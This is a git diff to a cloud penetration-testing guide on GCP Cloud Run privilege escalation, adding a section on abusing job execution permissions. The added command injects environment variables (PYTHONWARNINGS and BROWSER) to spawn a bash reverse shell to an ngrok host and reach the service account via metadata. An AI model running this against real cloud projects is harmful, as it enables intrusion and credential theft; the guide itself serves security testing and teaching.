diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md
index 3c147ce5c0..4910b0b6a5 100644
--- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md
+++ b/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md
@@ -78,7 +78,17 @@ gcloud beta run jobs update hacked \
 --execute-now
 ```
 
-### `run.jobs.setIamPolicy`
+### run.jobs.run, run.jobs.runWithOverrides, (run.jobs.get)
+
+Abuse the env variables of a job execution to execute arbitrary code and get a reverse shell to dump the contents of the container (source code) and access the SA inside the metadata: 
+
+{% code overflow="wrap" %}
+```bash
+gcloud beta run jobs execute job-name --region <region> --update-env-vars="PYTHONWARNINGS=all:0:antigravity.x:0:0,BROWSER=/bin/bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/14195 0>&1' #%s"
+```
+{% endcode %}
+
+### `çrun.jobs.setIamPolicy`
 
 Give yourself the previous permissions over Cloud Jobs.